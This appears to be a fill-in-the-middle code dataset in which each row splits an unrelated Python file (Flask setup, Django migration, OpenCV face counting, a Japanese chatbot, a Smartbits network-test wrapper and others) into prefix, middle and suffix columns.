prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
# -*- coding: utf-8 -*- |
# ===========================================================================
#
# Copyright (C) 2014 Samuel Masuy. All rights reserved.
# samuel.masuy@gm | ail.com
#
# ===========================================================================
from flask import Flask
# Declare app object
app = Flask(__name__)
# tell flask where is the config file
app.config.from_object('config')
app.debug = True
from app import views
|
""" $lic$
Copyright (C) 2016-2020 by Tsinghua University and The Board of Trustees of
Stanford University
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modifi | ed BSD-3 License along with this
program. If not, see <h | ttps://opensource.org/licenses/BSD-3-Clause>.
"""
'''
Enum for loop types.
'''
IFM = 0
OFM = 1
BAT = 2
NUM = 3
|
from south.db import db
from django.db import models
from askmeanything.models import *
class Migration:
def forwards(self, orm):
"Write your forwards migration here"
def backwards(self, orm):
"Write your backwards migration here"
models = {
'askmeanything.poll': {
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polls'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'open': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'askmeanything.response': {
'answer': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'poll': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responses'", 'to': "orm['askmeanything.Poll']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length | ': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_conten | t_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['askmeanything']
|
# -*- coding: utf-8 -*-
""" Tests of managing ESX hypervisors directly. If another direct ones will be supported, it should
not be difficult to extend the parametrizer.
"""
import pytest
import random
from cfme.infrastructure.provider import VMwareProvider
from utils.conf import cfme_data, credentials
from utils.net import resolve_hostname
from utils.providers import get_crud
from utils.version import Version
from utils.wait import wait_for
def pytest_generate_tests(metafunc):
arg_names = "provider", "provider_data", "original_provider_key"
arg_values = []
arg_ids = []
for provider_key, provider in cfme_data.get("management_systems", {}).iteritems():
if provider["type"] != "virtualcenter":
continue
hosts = provider.get("hosts", [])
if not hosts:
continue
version = provider.get("version", None)
if version is None:
# No version, no test
continue
if Version(version) < "5.0":
# Ignore lesser than 5
continue
host = random.choice(hosts)
creds = credentials[host["credentials"]]
ip_address = resolve_hostname(host["name"])
cred = VMwareProvider.Credential(
principal=creds["username"],
secret=creds["password"],
verify_secret=creds["password"]
)
# Mock provider data
provider_data = {}
provider_data.update(provider)
provider_data["name"] = host["name"]
provider_data["hostname"] = host["name"]
provider_data["ipaddress"] = ip_address
provider_data["credentials"] = host["credentials"]
provider_data.pop("host_provisioning", None)
provider_data["hosts"] = [host]
provider_data["discovery_range"] = {}
provider_data["discovery_range"]["start"] = ip_address
provider_data["discovery_range"]["end"] = ip_address
host_provider = VMwareProvider(
name=host["name"],
hostname=host["name"],
ip_address=ip_address,
credentials={'default': cred},
provider_data=provider_data,
)
arg_values.append([host_provider, provider_data, provider_key])
arg_ids.append("{}/random_host".format(provider_key))
metafunc.parametrize(arg_names, arg_values, ids=arg_ids, scope="module")
@pytest.yield_fixture(scope="module")
def setup_provider(provider, original_provider_key):
original_provider = get_crud(original_provider_key)
if original_provider.exists:
# Delete original provider's hosts first
for host in original_provider.hosts:
if host.exists:
host.delete(cancel=False)
# Get rid of the original provider, it would make a mess.
original_provider.delete(cancel=False)
| provider.wait_for_delete()
provider.create()
provider.refr | esh_provider_relationships()
try:
wait_for(
lambda: any([
provider.num_vm() > 0,
provider.num_template() > 0,
provider.num_datastore() > 0,
provider.num_host() > 0,
]), num_sec=400, delay=5)
except:
provider.delete(cancel=False)
raise
yield
for host in provider.hosts:
if host.exists:
host.delete(cancel=False)
provider.delete(cancel=False)
provider.wait_for_delete()
def test_validate(provider, setup_provider, provider_data):
"""Since the provider (host) gets added in the fixture, nothing special has to happen here."""
provider.validate(db=False)
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the | License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import os
import pisilinux.context as ctx
import pisilinux.db.lazy | db as lazydb
import pisilinux.history
class HistoryDB(lazydb.LazyDB):
def init(self):
self.__logs = self.__generate_history()
self.history = pisilinux.history.History()
def __generate_history(self):
logs = [x for x in os.listdir(ctx.config.history_dir()) if x.endswith(".xml")]
logs.sort(lambda x,y:int(x.split("_")[0]) - int(y.split("_")[0]))
logs.reverse()
return logs
def create_history(self, operation):
self.history.create(operation)
def add_and_update(self, pkgBefore=None, pkgAfter=None, operation=None, otype=None):
self.add_package(pkgBefore, pkgAfter, operation, otype)
self.update_history()
def add_package(self, pkgBefore=None, pkgAfter=None, operation=None, otype=None):
self.history.add(pkgBefore, pkgAfter, operation, otype)
def load_config(self, operation, package):
config_dir = os.path.join(ctx.config.history_dir(), "%03d" % operation, package)
if os.path.exists(config_dir):
import distutils.dir_util as dir_util
dir_util.copy_tree(config_dir, "/")
def save_config(self, package, config_file):
hist_dir = os.path.join(ctx.config.history_dir(), self.history.operation.no, package)
if os.path.isdir(config_file):
os.makedirs(os.path.join(hist_dir, config_file))
return
destdir = os.path.join(hist_dir, config_file[1:])
pisilinux.util.copy_file_stat(config_file, destdir);
def update_repo(self, repo, uri, operation = None):
self.history.update_repo(repo, uri, operation)
self.update_history()
def update_history(self):
self.history.update()
def get_operation(self, operation):
for log in self.__logs:
if log.startswith("%03d_" % operation):
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
return hist.operation
return None
def get_package_config_files(self, operation, package):
package_path = os.path.join(ctx.config.history_dir(), "%03d/%s" % (operation, package))
if not os.path.exists(package_path):
return None
configs = []
for root, dirs, files in os.walk(package_path):
for f in files:
configs.append(("%s/%s" % (root, f)))
return configs
def get_config_files(self, operation):
config_path = os.path.join(ctx.config.history_dir(), "%03d" % operation)
if not os.path.exists(config_path):
return None
allconfigs = {}
packages = os.listdir(config_path)
for package in packages:
allconfigs[package] = self.get_package_config_files(operation, package)
return allconfigs
def get_till_operation(self, operation):
if not [x for x in self.__logs if x.startswith("%03d_" % operation)]:
return
for log in self.__logs:
if log.startswith("%03d_" % operation):
return
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
yield hist.operation
def get_last(self, count=0):
count = count or len(self.__logs)
for log in self.__logs[:count]:
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), log))
hist.operation.no = int(log.split("_")[0])
yield hist.operation
def get_last_repo_update(self, last=1):
repoupdates = [l for l in self.__logs if l.endswith("repoupdate.xml")]
repoupdates.reverse()
if not len(repoupdates) >= 2:
return None
if last != 1 and len(repoupdates) <= last:
return None
hist = pisilinux.history.History(os.path.join(ctx.config.history_dir(), repoupdates[-last]))
return hist.operation.date
|
from chainer import cuda
from chainer.functions.math import identity
from chainer import link
class Parameter(link.Link):
"""Link that just holds a parameter and returns it.
.. deprecated:: v1.5
The parameters are stored as variables as of v1.5. Use them directly
instead.
Args:
array: Initial parameter array.
Attributes:
W (~chainer.Variable): Parameter variable.
"""
def __init__(self, array):
super(Parameter, self).__init__()
self.add_param('W', array.shape, dtype=array.dtype)
self.W.data = array
if isinstance(array, cuda.ndarray):
self.to_gpu(cuda.get_device_from_array(array))
def __call__(self, volatile='off'):
"""Returns the parameter variable.
Args:
volatile (~chainer.Flag): The volatility of the returned variable.
Returns:
~chainer.Variable: A copy of the parameter variable with given
volatility.
"""
# The first identity creates a copy of W, and the second identity cut | s
# the edge if volatility is ON
W = identity.identity(s | elf.W)
W.volatile = volatile
return identity.identity(W)
|
#!/usr/bin/env python
"""Basic exa | mple
Demonstrates how to create symbols and print some algebra operations.
"""
from sympy import Symbol, pprint
def main():
a = Symbol('a')
b = Symbol('b')
c = Symbol('c')
e = ( a*b*b + 2*b*a*b )**c
| print('')
pprint(e)
print('')
if __name__ == "__main__":
main()
|
import cv2
import numpy as np
import datetime as dt
# constant
faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
OPENCV_METHODS = {
"Correlation": 0,
| "Chi-Squared": 1,
"Intersection": 2,
"Hellinger": 3}
hist_limit = 0.6
ttl = 1 | * 60
q_limit = 3
# init variables
total_count = 0
prev_count = 0
total_delta = 0
stm = {}
q = []
term_crit = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)
video_capture = cv2.VideoCapture(0)
while True:
for t in list(stm): # short term memory
if (dt.datetime.now() - t).seconds > ttl:
stm.pop(t, None)
# Capture frame-by-frame
ret, frame = video_capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.2,
minNeighbors=5,
minSize=(30, 30),
flags=cv2.CASCADE_SCALE_IMAGE
)
count = len(faces)
if len(q) >= q_limit: del q[0]
q.append(count)
isSame = True
for c in q: # Protect from fluctuation
if c != count: isSame = False
if isSame is False: continue
max_hist = 0
total_delta = 0
for (x, y, w, h) in faces:
# Draw a rectangle around the faces
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
if count == prev_count: continue
# set up the ROI
face = frame[y: y + h, x: x + w]
hsv_roi = cv2.cvtColor(face, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(face, np.array((0., 60., 32.)), np.array((180., 255., 255.)))
face_hist = cv2.calcHist([face], [0], mask, [180], [0, 180])
cv2.normalize(face_hist, face_hist, 0, 255, cv2.NORM_MINMAX)
isFound = False
for t in stm:
hist_compare = cv2.compareHist(stm[t], face_hist, OPENCV_METHODS["Correlation"])
if hist_compare > max_hist: max_hist = hist_compare
if hist_compare >= hist_limit: isFound = True
if (len(stm) == 0) or (isFound is False and max_hist > 0):
total_delta += 1
stm[dt.datetime.now()] = face_hist
if prev_count != count:
total_count += total_delta
print("", count, " > ", total_count)
prev_count = count
# Display the resulting frame
cv2.imshow('Video', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything is done, release the capture
video_capture.release()
cv2.destroyAllWindows()
|
']
ans_title = result['title']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs(ans_what + "'" + ans_title + "'" + 'があります。' + '(' + ans_when_time + ')')
rfs('開催場所:' + ans_where)
elif category_ans == 'when':
#print('category is when')
result = result['data']
ans_title = result['title']
ans_when_day = result['when_day']
ans_when_time = result['when_time']
ans_where = result['where']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(str(ans_when_day) + '日の' + str(ans_when_time) + '開始です。')
rfs('開催場所:' + ans_where)
elif category_ans == 'who':
#print('category is who')
result = result['data']
ans_title = result['title']
ans_name = result['who']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_name + 'さん。')
elif category_ans == 'where':
#print('category is where')
result = result['data']
ans_title = result['title']
ans_where = result['where']
ans_when_time = result['when_time']
print('[' + str(count) + ']')
rfs('title:' + str(ans_title))
rfs(ans_where + 'で行われます。')
elif category_ans == 'how_time':
#print('category is how_time')
result = result['data']
ans_title = result['title']
ans_how_time = result['how_time']
print('[' + str(count) + ']')
rfs(ans_title + ':' + ans_how_time + '時間')
else:
print('category is why or how')
rfs('スタッフへ引き継ぎます。')
#終了
record.record_A('----- conversation end -----',header = None)
#履歴の表示
df = pandas.read_csv('conversation_log.csv')
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#解答番号をカウントアップ
count += 1
print('----------')
#情報検索部(k3)にアクセスしてDBを検索する
#該当するタプルはリスト化して返される
def look_k3(data):
k3.set_params(data)
return k3.search()
#ユーザーに欲しい情報があるか否かを質問して、
#ない場合は、もう一度初めからやり直す
#yes_or_no_one:一意の返答の場合
def yes_or_no_one(result,count_row_start):
if result['image'] != None:
rfs('>詳細を表示します')
im = Image.open(result['image'])
im.show()
rfs('>欲しい情報でしたか?(yes/no)')
u_ans = input('Input: ')
rfu(u_ans)
if u_ans == 'yes':
result_more = result
ans_main_t3.more_question(result_more)
elif u_ans == 'no':
rfs('>スタッフへ引き継ぐために履歴を表示します。')
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#ユーザーに欲しい情報があるか否かを質問して、
#ない場合は、もう一度初めからやり直す
#yes_or_no_one:複数の返答の場合
def yes_or_no_some(results,list_num,count_row_start):
rfs('>欲しい情報はありましたか?(yes/no)')
u_ans = input('Input: ')
rfu(u_ans)
if u_ans == 'yes':
#ユーザーが欲しかった情報の回答番号を確保
rfs('>良かったです!何番の回答でしたか?')
ans_num = input('Input: ')
#間違った数字が入力されたときのエラー対処
if list_num < int(ans_num):
ans_num = ans_main_t3.what_num(list_num)
#任意の番号の回答を確保する
result_more = results[int(ans_num)]['data']
ans_main_t3.more_question(result_more)
elif u_ans == 'no':
rfs('>スタッフへ引き継ぐために履歴を表示します。')
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv', header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
else:
ans_main_t3.yes_or_no_some(results,list_num,count_row_start)
'''
rfs('>もう一度初めから開始しますか?(yes/no)')
# 入力
u_ans = input('Input: ')
rfu(u_ans)
if u_ans == 'yes':
main_t3.start()
else:
record.record_A('----- conversation end -----')
sys.exit()
'''
#正しい番号が入力されるまで無限ループ
def what_num(ans_num):
rfs('>正しい番号を入力してください。(0 ~ ' + str(ans_num) + ')')
num = input('Input: ')
if ans_num >= int(num) :
return num
else:
ans_main_t3.what_num(ans_num)
#yes or noが入力されるまで無限ループ
def more_(text):
rfs(">" + text +'(yes/no)')
ans = input('Input: ')
if ans == 'yes|no':
return ans
else:
ans_main_t3.y_or_n(text)
#ユーザーの深追い質問に対応する
def more_question(result_more):
#応答について深追いの質問があるか否か(さらに、場所や時間を訪ねる時)
#画像が用意されている場合は表示する
if result_more['image'] != None:
rfs('詳細を表示します')
im = Image.open(result_more['image'])
im.show()
rfs('>これについて、何か質問はありますか?(yes/no)')
u_ans2 = input('Input: ')
rfu(u_ans2)
if u_ans2 =='no':
rfs('>また、質問してくださいね!Have a nice day!')
record.record_A('----- conversation end -----')
sys.exit()
elif u_ans2 == 'yes':
rfs('>質問は何でしょうか?')
# 入力
st = input('Input: ')
rfu(st)
category_ans = get_nlc.nlc_0(st)
more_category ='カテゴリー: '
print( more_category + category_ans)
if category_ans == 'what':
rfs('>title:' + result_more['title'])
elif category_ans == 'who':
rfs(">" + result_more['who'] + 'さんです。')
elif category_ans == 'where':
rfs(">" + result_more['where'] + 'です。')
elif category_ans == 'how_time' :
rfs(">" + result_more['how_time'] + 'です。')
elif category_ans == 'when':
rfs(">" + result_more['when_day']+'日の'+result_more['when_time']+'です。')
rfs('>もう一度初めから開始しますか?(yes/no)')
# 入力
u_ans = input('Input: ')
rfu(u_ans)
if u_ans == 'yes':
main_t3.start()
else:
rfs('>また、質問してくださいね!Have a nice day!')
record.record_A('----- conversation end -----')
sys.exit()
#yesとno以外が入力されたときのエラー処理
else:
rfs('>yesかnoを入力してください')
ans_main_t3.more_question(result_more)
#自信値が1以上のテーブルの数をカウントする
def count_list(results):
count = 0
for result in results:
if result['reliability'] < 1:
return count
count += 1
return count
#回答候補の中の条件全検索のテーブル数をカウントする
def count_list_condition(results):
count = 0
for result in results:
if result['all_and'] == 0:
return count
count += 1
return count
#情報検索部(k3)から返されたタプルの数によってそれぞれの返答をする。
#回答候補が5個以上の場合、追加質問を行う。
def anser(data,category_ans,add_q_count,results,count_row_start):
#信頼度1以上の回答候補をカウントする
ans_count = ans_main_t3.count_list(results)
#k3システムから返されたリストの数を数える
res_count = len(results)
#追加質問を2度行った時
if int(add_q_count) >= 2:
#条件の全検索で見つかった場合
if res_co | unt > 0 and results[0]['all_and'] == 1:
ans_count_condition = ans_main_t3.count_list_condition(results)
#条件全検索リストが1つの時
if ans_count_condition == 1:
rfs('>条件の全検索で当てはまるものが一件見つかりました。' | )
ans_main_t3.one_ans(category_ans,results)
ans_main_t3.yes_or_no_one(results[0]['data'],count_row_start)
#条件全検索リストが2つ~8つの時
elif ans_count_condition <= 8:
rfs('>条件の全検索で当てはまるものが複数見つかりました。')
ans_main_t3.some_ans_all(category_ans,results,count_row_start)
ans_main_t3.yes_or_no_some(results,ans_conut_condition,count_row_start)
#条件全検索リストが5つ以上の時
elif ans_count_condition > 8:
rfs('>追加質問の内容を加味して再検索しましたが、候補となる結果が絞りきれませんでした。')
rfs('>スタッフにひきつぐために履歴表示をします。')
#終了
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#条件の部分検索で見つかった場合
elif res_count == 0 or results[0]['all_and'] == 0:
if int(ans_count) == 0:
rfs('>追加質問の内容を加味して再検索しましたが、結果が見つかりませんでした。')
rfs('>スタッフに引き継ぐために履歴表示をします。')
#終了
record.record_A('----- conversation end -----')
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
elif int(ans_count) == 1:
rfs('>条件の部分検索で当てはまりました。')
rfs('>代わりに似たものを表示させます。')
ans_main_t3.one_ans(category_ans,results,count_row_start)
ans_main_t3.yes_or_no_one(results[0]['data'],count_row_start)
#候補の数が8個以内の時
elif int(ans_count) <= 8:
rfs('>条件の部分検索では当てはまりました。')
rfs('>代わりに似たものを表示させます。')
ans_main_t3.some_ans(category_ans,results,ans_count,count_row_start)
ans_main_t3.yes_or_no_some(results,ans_count,count_row_start)
#候補の数が8個以上の時
elif int(ans_count) > 8:
rfs('>追加質問の内容を加味して再検索しましたが、候補となる結果が絞りきれませんでした。')
rfs('>スタッフにひきつぐために履歴表示をします。')
#終了
record.record_A('----- conversation end -----')
#履歴の表示
df = pandas.read_csv('conversation_log.csv',header = None)
print_record = df[count_row_start:]
print(print_record)
sys.exit()
#追加質問をまだ行っていない時
else:
#条件の全検索(AND)で見つかった時の返答
if res_count > 0 and results[0]['all_and'] == 1:
ans_count_condition = |
""" Test that import errors are detected. """
# pylint: disable=invalid-name, unused-import, no-absolute-import
import totally_missing # [import-error]
try:
import maybe_missing
except ImportError:
maybe_missing = None
try:
import maybe_missing_1
exce | pt (ImportError, SyntaxError):
maybe_missing_1 = None
try:
import maybe_missi | ng_2 # [import-error]
except ValueError:
maybe_missing_2 = None
|
"""
Copyright (C) 2016 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public Lice | nse version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
from bs4 import BeautifulSoup
from common import common_logging_elasticsearch_httpx
from . import common_network
from . import common_string
# http://www.tv-intros.com
def com_tvintro_download(media_name):
"""
Try to grab intro from tvintro
"""
# TODO doesn't match the tvintro........base from theme
data = BeautifulSoup(common_network.mk_network_fetch_from_url(
'http://www.tv-intros.com/' + media_name[0].upper() + '/'
+ common_string.com_string_title(media_name).replace(' ', '_')
+ ".html", None)).find(id="download_song")
if data is not None:
common_logging_elasticsearch_httpx.com_es_httpx_post(message_type='info',
message_text={'href': data['href']})
common_network.mk_network_fetch_from_url('http://www.tv-intros.com'
+ data['href'], 'theme.mp3')
return True # success
return False # no match
| |
import unittest
import sys
sys.path.append('./')
solutions = __import__('solutions.012_integer_to_roman', fromlist='*')
class Test012(unittest.TestCase):
def test_intToRoman(self):
| s = solutions.Solution()
self.assertEqual(s.intToRoman(1), "I")
| self.assertEqual(s.intToRoman(2), "II")
self.assertEqual(s.intToRoman(3), "III")
self.assertEqual(s.intToRoman(4), "IV")
self.assertEqual(s.intToRoman(5), "V")
self.assertEqual(s.intToRoman(6), "VI")
self.assertEqual(s.intToRoman(7), "VII")
self.assertEqual(s.intToRoman(8), "VIII")
self.assertEqual(s.intToRoman(9), "IX")
self.assertEqual(s.intToRoman(10), "X")
self.assertEqual(s.intToRoman(28), "XXVIII")
self.assertEqual(s.intToRoman(29), "XXIX")
self.assertEqual(s.intToRoman(40), "XL")
self.assertEqual(s.intToRoman(41), "XLI")
self.assertEqual(s.intToRoman(89), "LXXXIX")
self.assertEqual(s.intToRoman(98), "XCVIII")
self.assertEqual(s.intToRoman(99), "XCIX")
self.assertEqual(s.intToRoman(316), "CCCXVI")
self.assertEqual(s.intToRoman(400), "CD")
self.assertEqual(s.intToRoman(499), "CDXCIX")
self.assertEqual(s.intToRoman(894), "DCCCXCIV")
self.assertEqual(s.intToRoman(1499), "MCDXCIX")
self.assertEqual(s.intToRoman(3999), "MMMCMXCIX")
for i in xrange(1, 4000):
s.intToRoman(i)
if __name__ == '__main__':
unittest.main()
|
on2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is a high-level object interface the the Smartbits test system. It
also imports all of the low-level API calls. These low-level wrapper
classes are automatically generated by SWIG. You must first install the
smartbitsmodule in order for this to work. The SWIG program wraps the the
smartlib C API and this smartbits package makes it available to the Python
programmer. This module also defines some utility functions.
"""
from pycopia.smartbits.SMARTBITS import *
from pycopia.smartbits.smartbits_struct import *
from pycopia.smartbits.smartbits_func import *
SmartlibError = smartbits_funcc.SmartlibError
class SmartbitsError(SmartlibError):
pass
# you can subclass smartlib structures and add methods!
class HTCount(HTCountStructure):
pass
# some helpful functions follow, borrowed from Smartlib sample C code.
def linkToSmartBits(ipaddr=None, port=16385):
# ETGetLinkStatus will be positive if we're linked
try:
st = ETGetLinkStatus()
except SmartlibError, err:
if not ipaddr:
ipaddr = raw_input ("Enter IP address of SmartBits chassis ==> ")
try:
NSSocketLink(ipaddr,port,RESERVE_NONE)
except SmartlibError, err:
print_error_desc(err)
raise SmartbitsError, err[0]
def resetCard(hub, slot, port):
"""
HTResetPort resets card to power on defaults
"""
HTResetPort(RESET_FULL, hub, slot, port)
def setFill(hub, slot, port, fill_len):
"""
setFill(hub, slot, port, fill_len)
Sets the backgound fill pattern. The first 6 bytes are set to 0xFF
to create a broadcast packet. The rest of the packet is filled with 0xAA.
"""
fillData = "\xFF" * 6 + "\xAA" * fill_len
HTFillPattern( len(fillData), fillData, hub, slot, port)
def setVFD1(h1, s1, p1):
"""
Sets up VFD1 to overwrite the source MAC area of the packet
VFD 1 and 2 work like counters, will overwrite 1 to 6 bytes
and can be set static, increment or decrement.
Since we have set the fill to have FF FF FF FF FF FF in the first
six bytes and this VFD has an offset of 48 bits it will overwrite the
next six bytes with 66 55 44 33 22 11
"""
vfdstruct = HTVFDStructure()
# MAC will increment with each successive packet
vfdstruct.Configuration = HVFD_INCR
# will overwrite 6 bytes
vfdstruct.Range = 6
# 48 bits (6 bytes) after preamble - SOURCE MAC
vfdstruct.Offset = 48
# order is 0 = LSB - will produce a MAC address 66 55 44 33 22 11
# XXX current interface uses pointers
vfdData = ptrcreate("int",0,6)
ptrset(vfdData, 0x11, 0)
ptrset(vfdData, 0x22, 1)
ptrset(vfdData, 0x33, 2)
ptrset(vfdData, 0x44, 3)
ptrset(vfdData, 0x55, 4)
ptrset(vfdData, 0x66, 5)
# Associate the data with the VFD structure
vfdstruct.Data = vfdData
# will increment 5 times then repeat LSB of Source MAC will
# follow 11 12 13 14 15 11 12 pattern
vfdstruct.DataCount = 5
# send to config card
HTVFD( HVFD_1, vfdstruct, h1, s1, p1)
ptrfree(vfdData)
def setTrigger(h1, s1, p1):
"""
setTrigger
Sets a trigger to match the base source MAC address. Since we have a
cycle count of five on the VFD1 we are triggering on, our trigger will fire
every fifth packet.
"""
MyTrigger = HTTriggerStructure()
# start 48 bits after preamble (SOURCE MAC)
MyTrigger.Offset = 48
# trigger pattern is 6 bytes long
MyTrigger.Range = 6
# data to match is 66 55 44 33 22 11
# XXX future interface, use typemaps to allow python list assignment to
# memeber arrays.
MyTrigger.Pattern = [0x11, 0x22, 0x33, 0x44, 0x55, 0x66]
# send config to card
HTTrigger( HTTRIGGER_1, HTTRIGGER_ON, MyTrigger, h1, s1, p1)
def clearCounters(h1, s1, p1):
"""
clearCounters
zero out the counters on the target Hub Slot Port
"""
HTClearPort( h1, s1, p1)
def sendPackets(h1, s1, p1):
"""
sendPackets
HTRun will control transmission state of the card - with HTRUN mode it
will start transmitting, with HTSTOP it will stop transmitting.
A one second delay ensures the card has started transmitting, a while
loop checks to ensure the card has stopped transmitting before exiting.
The final 1 second wait allows time for the packets to get to the receive card.
"""
# Start transmission - card will transmit at whatever mode it is set to
HTRun( HTRUN, h1, s1, p1)
cs = HTCountStructure()
# Library 3.09 and higher includes delay function
NSDelay(1)
# Now wait until transmission stops
HTGetCounters( cs, h1, s1, p1)
while cs.TmtPktRate != 0:
HTGetCounters( cs, h1, s1, p1) |
NSDelay(1)
def promptForEnter():
"""
promptForEnter
Press Enter to continue procedure
waits until user presses ENTER
"""
raw_input("Press ENTER to continue.")
def showCounters(h1, s1, p1):
"""
showCounters
Display counts on target card. HTClearPort will clear couts
Card counter alwasy run. There is no Start command for counters.
Each element has a corresponding Rate (ie TmtPktRate RcvPktRate etc.
Thses counts will display the packets pe | r second counts while the card
is transmitting.
"""
cs = HTCount()
HTGetCounters( cs, h1, s1, p1)
print "========================================="
print "Counter Data Card", (s1 + 1)
print "========================================="
print " Transmitted Pkts " , cs.TmtPkt
print " Received Pkts " , cs.RcvPkt
print " Collisions " , cs.Collision
print " Received Triggers " , cs.RcvPkt
print " CRC Errors " , cs.CRC
print " Alignment Errors " , cs.Align
print " Oversize Pkts " , cs.Oversize
print " Undersize Pkts " , cs.Undersize
print "========================================="
promptForEnter()
def unlink():
ETUnLink()
####################################################################
# module self test. This is a translation from the 1stTest.c sample
# program.
if __name__ == "__main__":
import sys
hub1 = 0
slot1 = 0
port1 = 0
hub2 = 0
slot2 = 1
port2 = 0
numPackets = 100000
if len(sys.argv) > 1:
ipaddr = sys.argv[1]
else:
ipaddr = raw_input("Enter IP address of SmartBits chassis ==> ")
try:
ETSocketLink(ipaddr, 16385)
except Exception, err:
print "Error linking to chassis:", err
sys.exit()
print "successfully linked"
# reset cards
HTResetPort(RESET_FULL, hub1, slot1, port1)
HTResetPort(RESET_FULL, hub2, slot2, port2)
# clear counters
HTClearPort(hub1, slot1, port1)
HTClearPort(hub2, slot2, port2)
